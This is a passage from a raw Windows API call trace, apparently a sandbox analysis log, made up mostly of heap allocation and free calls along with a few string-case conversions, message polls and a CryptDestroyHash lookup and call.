0x24a9570 [0264.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0c8 [0264.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0264.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0264.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9eb8 [0264.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0264.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0264.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0264.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa878 [0264.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0264.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0264.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cc0 [0264.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b40 [0264.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c00 [0264.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0264.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0264.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0b0 [0264.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0264.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac9f0 [0264.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa278 [0264.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0264.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0264.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0264.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0264.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0264.156] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0264.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8dc0 [0264.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0264.156] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0264.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0264.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0264.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0264.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0264.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0264.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0264.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0264.157] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0264.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0264.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0264.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0264.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0264.157] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0264.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0264.157] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0264.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0264.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0264.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0264.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0264.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0264.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0264.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0264.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0264.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0264.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0264.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0264.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0264.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0264.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0264.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0264.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0264.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0264.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0264.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0264.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0264.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0264.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0264.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0264.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0264.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0264.159] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0264.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0264.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0264.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0264.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0264.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0264.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0264.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0264.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0264.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0264.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0264.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0264.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0264.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0264.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0264.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0264.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0264.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466dd0 [0264.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466dd0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0264.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0264.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0264.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0264.161] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0264.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0264.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0264.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0264.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0264.162] CryptDestroyHash (hHash=0xaa5860) returned 1 [0264.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0264.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0264.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0264.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0264.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0264.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0264.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0264.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0264.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0264.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0264.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0264.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0264.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0264.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0264.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0264.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0264.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0264.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0264.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0264.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0264.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0264.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0264.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0264.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0264.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0264.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0264.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0264.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0264.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0264.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0264.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0264.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0264.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0264.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0264.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0264.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0264.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0264.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0264.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0264.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0264.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0264.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0264.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0264.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0264.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0264.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0264.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0264.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0264.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0264.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0264.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.165] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0264.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0264.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0264.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0264.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0264.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0264.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0264.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0264.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0264.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0264.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0264.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0264.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0264.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0264.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0264.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0264.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0264.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0264.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0264.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0264.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0264.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0264.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0264.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0264.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0264.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0264.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0264.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0264.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0264.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0264.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0264.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0264.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0264.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0264.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0264.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0264.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0264.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0264.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0264.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0264.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0264.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0264.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0264.168] HeapFree (in: hHeap=0x25c0000, 